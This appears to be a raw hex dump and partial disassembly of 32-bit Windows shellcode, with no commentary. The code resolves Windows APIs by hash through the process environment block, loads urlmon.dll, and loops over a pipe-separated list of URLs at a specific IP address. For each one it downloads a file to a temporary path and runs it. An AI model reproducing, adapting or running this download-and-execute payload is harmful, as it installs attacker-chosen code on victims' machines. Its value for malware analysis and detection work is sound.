00000000 e8 00 00 00 00 5b 8d b3 bf 01 00 00 56 8d b3 ab .....[......V...
00000010 01 00 00 56 6a 04 68 88 4e 0d 00 e8 af 00 00 00 ...Vj.h.N.......
00000020 8d 83 d3 01 00 00 50 ff 93 bf 01 00 00 8d b3 cf ......P.........
00000030 01 00 00 56 8d b3 bb 01 00 00 56 6a 01 68 88 90 ...V......Vj.h..
00000040 03 00 e8 88 00 00 00 8d b3 de 01 00 00 89 f7 ac ................
00000050 3c 7c 74 06 84 c0 74 02 eb f5 c6 46 ff 00 80 3f <|t...t....F...?
00000060 00 74 08 57 e8 04 00 00 00 eb e2 c9 c3 55 89 e5 .t.W.........U..
00000070 81 ec 08 02 00 00 60 8d b5 f8 fd ff ff 56 68 60 ......`......Vh`
00000080 02 00 00 ff 93 c3 01 00 00 8d bd fc fe ff ff 57 ...............W
00000090 68 00 00 00 00 68 00 00 00 00 56 ff 93 c7 01 00 h....h....V.....
000000a0 00 68 00 00 00 00 68 00 00 00 00 57 ff 75 08 68 .h....h....W.u.h
000000b0 00 00 00 00 ff 93 cf 01 00 00 85 c0 75 0c 68 05 ............u.h.
000000c0 00 00 00 57 ff 93 cb 01 00 00 61 c9 c2 04 00 55 ...W......a....U
000000d0 89 e5 51 56 57 8b 4d 0c 8b 75 10 8b 7d 14 ff 36 ..QVW.M..u..}..6
000000e0 ff 75 08 e8 13 00 00 00 89 07 83 c7 04 83 c6 04 .u..............
000000f0 e2 ec 5f 5e 59 89 ec 5d c2 10 00 55 89 e5 53 56 .._^Y..]...U..SV
00000100 57 51 64 ff 35 30 00 00 00 58 8b 40 0c 8b 48 0c WQd.50...X.@..H.
00000110 8b 11 8b 41 30 6a 02 8b 7d 08 57 50 e8 5b 00 00 ...A0j..}.WP.[..
00000120 00 85 c0 74 04 89 d1 eb e7 8b 41 18 50 8b 58 3c ...t......A.P.X<
00000130 01 d8 8b 58 78 58 50 01 c3 8b 4b 1c 8b 53 20 8b ...XxXP...K..S .
00000140 5b 24 01 c1 01 c2 01 c3 8b 32 58 50 01 c6 6a 01 [$.......2XP..j.
00000150 ff 75 0c 56 e8 23 00 00 00 85 c0 74 08 83 c2 04 .u.V.#.....t....
00000160 83 c3 02 eb e3 58 31 d2 66 8b 13 c1 e2 02 01 d1 .....X1.f.......
00000170 03 01 59 5f 5e 5b 89 ec 5d c2 08 00 55 89 e5 51 ..Y_^[..]...U..Q
00000180 53 52 31 c9 31 db 31 d2 8b 45 08 8a 10 80 ca 60 SR1.1.1..E.....`
00000190 01 d3 d1 e3 03 45 10 8a 08 84 c9 e0 ee 31 c0 8b .....E.......1..
000001a0 4d 0c 39 cb 74 01 40 5a 5b 59 89 ec 5d c2 0c 00 M.9.t.@Z[Y..]...
000001b0 86 57 0d 00 92 21 0d 00 ce 15 d2 00 ea 6f 00 00 .W...!.......o..
000001c0 c6 30 8e 03 00 00 00 00 00 00 00 00 00 00 00 00 .0..............
000001d0 00 00 00 00 00 00 00 00 75 72 6c 6d 6f 6e 2e 64 ........urlmon.d
000001e0 6c 6c 00 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36 ll.http://144.76
000001f0 2e 31 39 32 2e 31 30 32 2f 3f 39 64 65 32 36 66 .192.102/?9de26f
00000200 66 33 62 36 36 62 61 38 32 62 33 35 65 33 31 62 f3b66ba82b35e31b
00000210 66 34 65 61 39 37 35 64 66 65 7c 68 74 74 70 3a f4ea975dfe|http:
00000220 2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32 //144.76.192.102
00000230 2f 3f 39 30 66 35 62 39 61 31 66 62 63 62 32 65 /?90f5b9a1fbcb2e
00000240 34 61 38 37 39 30 30 31 61 32 38 64 37 39 34 30 4a879001a28d7940
00000250 62 34 7c 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36 b4|http://144.76
00000260 2e 31 39 32 2e 31 30 32 2f 3f 38 65 65 63 36 63 .192.102/?8eec6c
00000270 35 39 36 62 62 33 65 36 38 34 30 39 32 62 39 65 596bb3e684092b9e
00000280 61 38 39 37 30 64 37 65 61 65 7c 68 74 74 70 3a a8970d7eae|http:
00000290 2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32 //144.76.192.102
000002a0 2f 3f 33 35 35 32 33 62 62 38 31 65 63 61 36 30 /?35523bb81eca60
000002b0 34 66 39 65 62 64 31 37 34 38 38 37 39 66 33 66 4f9ebd1748879f3f
000002c0 63 31 7c 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36 c1|http://144.76
000002d0 2e 31 39 32 2e 31 30 32 2f 3f 62 32 38 62 30 36 .192.102/?b28b06
000002e0 66 30 31 65 32 31 39 64 35 38 65 66 62 61 39 66 f01e219d58efba9f
000002f0 65 30 64 31 66 65 31 62 62 33 7c 68 74 74 70 3a e0d1fe1bb3|http:
00000300 2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32 //144.76.192.102
00000310 2f 3f 35 32 64 34 65 36 34 34 65 39 63 64 61 35 /?52d4e644e9cda5
00000320 31 38 38 32 34 32 39 33 65 37 61 34 63 64 62 37 18824293e7a4cdb7
00000330 61 31 00 a1.
Disassembly of the code portion:
00000000 E800000000 call dword 0x5
00000005 5B pop ebx
00000006 8DB3BF010000 lea esi,[ebx+0x1bf]
0000000C 56 push esi
0000000D 8DB3AB010000 lea esi,[ebx+0x1ab]
00000013 56 push esi
00000014 6A04 push byte +0x4
00000016 68884E0D00 push dword 0xd4e88
0000001B E8AF000000 call dword 0xcf
00000020 8D83D3010000 lea eax,[ebx+0x1d3]
00000026 50 push eax
00000027 FF93BF010000 call dword [ebx+0x1bf]
0000002D 8DB3CF010000 lea esi,[ebx+0x1cf]
00000033 56 push esi
00000034 8DB3BB010000 lea esi,[ebx+0x1bb]
0000003A 56 push esi
0000003B 6A01 push byte +0x1
0000003D 6888900300 push dword 0x39088
00000042 E888000000 call dword 0xcf
00000047 8DB3DE010000 lea esi,[ebx+0x1de]
0000004D 89F7 mov edi,esi
0000004F AC lodsb
00000050 3C7C cmp al,0x7c
00000052 7406 jz 0x5a
00000054 84C0 test al,al
00000056 7402 jz 0x5a
00000058 EBF5 jmp short 0x4f
0000005A C646FF00 mov byte [esi-0x1],0x0
0000005E 803F00 cmp byte [edi],0x0
00000061 7408 jz 0x6b
00000063 57 push edi
00000064 E804000000 call dword 0x6d
00000069 EBE2 jmp short 0x4d
0000006B C9 leave
0000006C C3 ret
0000006D 55 push ebp
0000006E 89E5 mov ebp,esp
00000070 81EC08020000 sub esp,0x208
00000076 60 pushad
00000077 8DB5F8FDFFFF lea esi,[ebp-0x208]
0000007D 56 push esi
0000007E 6860020000 push dword 0x260
00000083 FF93C3010000 call dword [ebx+0x1c3]
00000089 8DBDFCFEFFFF lea edi,[ebp-0x104]
0000008F 57 push edi
00000090 6800000000 push dword 0x0
00000095 6800000000 push dword 0x0
0000009A 56 push esi
0000009B FF93C7010000 call dword [ebx+0x1c7]
000000A1 6800000000 push dword 0x0
000000A6 6800000000 push dword 0x0
000000AB 57 push edi
000000AC FF7508 push dword [ebp+0x8]
000000AF 6800000000 push dword 0x0
000000B4 FF93CF010000 call dword [ebx+0x1cf]
000000BA 85C0 test eax,eax
000000BC 750C jnz 0xca
000000BE 6805000000 push dword 0x5
000000C3 57 push edi
000000C4 FF93CB010000 call dword [ebx+0x1cb]
000000CA 61 popad
000000CB C9 leave
000000CC C20400 ret 0x4
000000CF 55 push ebp
000000D0 89E5 mov ebp,esp
000000D2 51 push ecx
000000D3 56 push esi
000000D4 57 push edi
000000D5 8B4D0C mov ecx,[ebp+0xc]
000000D8 8B7510 mov esi,[ebp+0x10]
000000DB 8B7D14 mov edi,[ebp+0x14]
000000DE FF36 push dword [esi]
000000E0 FF7508 push dword [ebp+0x8]
000000E3 E813000000 call dword 0xfb
000000E8 8907 mov [edi],eax
000000EA 83C704 add edi,byte +0x4
000000ED 83C604 add esi,byte +0x4
000000F0 E2EC loop 0xde
000000F2 5F pop edi
000000F3 5E pop esi
000000F4 59 pop ecx
000000F5 89EC mov esp,ebp
000000F7 5D pop ebp
000000F8 C21000 ret 0x10
000000FB 55 push ebp
000000FC 89E5 mov ebp,esp
000000FE 53 push ebx
000000FF 56 push esi
00000100 57 push edi
00000101 51 push ecx
00000102 64FF3530000000 push dword [dword fs:0x30]
00000109 58 pop eax
0000010A 8B400C mov eax,[eax+0xc]
0000010D 8B480C mov ecx,[eax+0xc]
00000110 8B11 mov edx,[ecx]
00000112 8B4130 mov eax,[ecx+0x30]
00000115 6A02 push byte +0x2
00000117 8B7D08 mov edi,[ebp+0x8]
0000011A 57 push edi
0000011B 50 push eax
0000011C E85B000000 call dword 0x17c
00000121 85C0 test eax,eax
00000123 7404 jz 0x129
00000125 89D1 mov ecx,edx
00000127 EBE7 jmp short 0x110
00000129 8B4118 mov eax,[ecx+0x18]
0000012C 50 push eax
0000012D 8B583C mov ebx,[eax+0x3c]
00000130 01D8 add eax,ebx
00000132 8B5878 mov ebx,[eax+0x78]
00000135 58 pop eax
00000136 50 push eax
00000137 01C3 add ebx,eax
00000139 8B4B1C mov ecx,[ebx+0x1c]
0000013C 8B5320 mov edx,[ebx+0x20]
0000013F 8B5B24 mov ebx,[ebx+0x24]
00000142 01C1 add ecx,eax
00000144 01C2 add edx,eax
00000146 01C3 add ebx,eax
00000148 8B32 mov esi,[edx]
0000014A 58 pop eax
0000014B 50 push eax
0000014C 01C6 add esi,eax
0000014E 6A01 push byte +0x1
00000150 FF750C push dword [ebp+0xc]
00000153 56 push esi
00000154 E823000000 call dword 0x17c
00000159 85C0 test eax,eax
0000015B 7408 jz 0x165
0000015D 83C204 add edx,byte +0x4
00000160 83C302 add ebx,byte +0x2
00000163 EBE3 jmp short 0x148
00000165 58 pop eax
00000166 31D2 xor edx,edx
00000168 668B13 mov dx,[ebx]
0000016B C1E202 shl edx,0x2
0000016E 01D1 add ecx,edx
00000170 0301 add eax,[ecx]
00000172 59 pop ecx
00000173 5F pop edi
00000174 5E pop esi
00000175 5B pop ebx
00000176 89EC mov esp,ebp
00000178 5D pop ebp
00000179 C20800 ret 0x8